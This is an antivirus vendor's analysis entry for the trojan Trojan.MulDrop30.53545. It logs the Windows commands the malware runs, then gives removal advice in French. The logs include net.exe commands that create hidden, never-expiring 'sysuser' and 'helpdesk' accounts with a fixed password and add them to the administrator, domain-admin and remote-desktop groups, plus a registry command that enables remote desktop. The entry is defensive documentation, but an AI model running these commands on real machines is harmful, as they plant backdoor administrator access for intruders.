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Profil

Trojan.MulDrop30.53545

Added to the Dr.Web virus database: 2025-04-08

Virus description added:

Technical Information

Malicious functions
Executes the following
  • '%WINDIR%\syswow64\net.exe' user sysuser 1ASDqwe /expires:never /add
  • '%WINDIR%\syswow64\net.exe' localgroup administrators sysuser /add
  • '%WINDIR%\syswow64\net.exe' localgroup "remote desktop users" sysuser /add
  • '%WINDIR%\syswow64\net.exe' group "domain admins" sysuser /add
  • '%WINDIR%\syswow64\net.exe' user helpdesk 1ASDqwe /expires:never /add
  • '%WINDIR%\syswow64\net.exe' localgroup administrators helpdesk /add
  • '%WINDIR%\syswow64\net.exe' localgroup "remote desktop users" helpdesk /add
Modifies file system
Creates the following files
  • %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
  • %APPDATA%\microsoft\windows\cookies\low\index.dat
  • %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
Network activity
TCP
Other
  • '34.##9.100.209':443
Miscellaneous
Executes the following
  • '%WINDIR%\syswow64\net1.exe' user sysuser 1ASDqwe
  • '%WINDIR%\syswow64\net1.exe' group "domain admins" helpdesk /add
  • '%WINDIR%\syswow64\net.exe' user helpdesk 1ASDqwe
  • '%WINDIR%\syswow64\net1.exe' user helpdesk /active:yes
  • '%WINDIR%\syswow64\net1.exe' localgroup "remote desktop users" helpdesk /add
  • '%WINDIR%\syswow64\net.exe' group "domain admins" helpdesk /add
  • '%WINDIR%\syswow64\reg.exe' add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f
  • '%WINDIR%\syswow64\net1.exe' user helpdesk 1ASDqwe /expires:never /add
  • '%WINDIR%\syswow64\net.exe' user helpdesk /active:yes
  • '%WINDIR%\syswow64\net.exe' user helpdesk /expires:never
  • '%WINDIR%\syswow64\net.exe' user sysuser 1ASDqwe
  • '%WINDIR%\syswow64\net1.exe' user sysuser 1ASDqwe /expires:never /add
  • '%WINDIR%\syswow64\net1.exe' user sysuser /expires:never
  • '%WINDIR%\syswow64\net.exe' user sysuser /expires:never
  • '%WINDIR%\syswow64\net1.exe' user sysuser /active:yes
  • '%WINDIR%\syswow64\net1.exe' localgroup administrators helpdesk /add
  • '<SYSTEM32>\rundll32.exe' "<SYSTEM32>\WININET.dll",DispatchAPICall 1
  • '%WINDIR%\syswow64\net1.exe' user helpdesk 1ASDqwe
  • '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\syswow64\WININET.dll",DispatchAPICall 1
  • '%WINDIR%\syswow64\net1.exe' localgroup administrators sysuser /add
  • '%WINDIR%\syswow64\net.exe' user sysuser /active:yes
  • '%WINDIR%\syswow64\net1.exe' user helpdesk /expires:never
  • '%WINDIR%\syswow64\net1.exe' group "domain admins" sysuser /add
  • '%WINDIR%\syswow64\net1.exe' localgroup "remote desktop users" sysuser /add
  • '%WINDIR%\syswow64\net.exe' user helpdesk /active:yes' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' localgroup "remote desktop users" helpdesk /add' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' user helpdesk /expires:never' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' user sysuser 1ASDqwe /expires:never /add' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' group "domain admins" helpdesk /add' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' localgroup administrators helpdesk /add' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' user sysuser /expires:never' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' user sysuser 1ASDqwe' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' user sysuser /active:yes' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' group "domain admins" sysuser /add' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' localgroup "remote desktop users" sysuser /add' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' localgroup administrators sysuser /add' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' user helpdesk 1ASDqwe /expires:never /add' (with hidden window)
  • '%WINDIR%\syswow64\net.exe' user helpdesk 1ASDqwe' (with hidden window)
  • '%WINDIR%\syswow64\reg.exe' add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f' (with hidden window)

Recommandations pour le traitement

  1. Si le système d'exploitation peut être démarré (en mode normal ou en mode sans échec), téléchargez Dr.Web Security Space et lancez un scan complet de votre ordinateur et de tous les supports amovibles que vous utilisez. En savoir plus sur Dr.Web Security Space.
  2. Si le démarrage du système d'exploitation est impossible, veuillez modifier les paramètres du BIOS de votre ordinateur pour démarrer votre ordinateur via CD/DVD ou clé USB. Téléchargez l'image du disque de secours de restauration du système Dr.Web® LiveDisk ou l'utilitaire pour enregistrer Dr.Web® LiveDisk sur une clé USB, puis préparez la clé USB appropriée. Démarrez l'ordinateur à l'aide de cette clé et lancez le scan complet et le traitement des menaces détectées.

Veuillez lancer le scan complet du système à l'aide de Dr.Web Antivirus pour Mac OS.

Veuillez lancer le scan complet de toutes les partitions du disque à l'aide de Dr.Web Antivirus pour Linux.

  1. Si votre appareil mobile fonctionne correctement, veuillez télécharger et installer sur votre appareil mobile Dr.Web pour Android. Lancez un scan complet et suivez les recommandations sur la neutralisation des menaces détectées.
  2. Si l'appareil mobile est bloqué par le Trojan de la famille Android.Locker (un message sur la violation grave de la loi ou la demande d'une rançon est affiché sur l'écran de l'appareil mobile), procédez comme suit:
    • démarrez votre Smartphone ou votre tablette en mode sans échec (si vous ne savez pas comment faire, consultez la documentation de l'appareil mobile ou contactez le fabricant) ;
    • puis téléchargez et installez sur votre appareil mobile Dr.Web pour Android et lancez un scan complet puis suivez les recommandations sur la neutralisation des menaces détectées ;
    • Débranchez votre appareil et rebranchez-le.

En savoir plus sur Dr.Web pour Android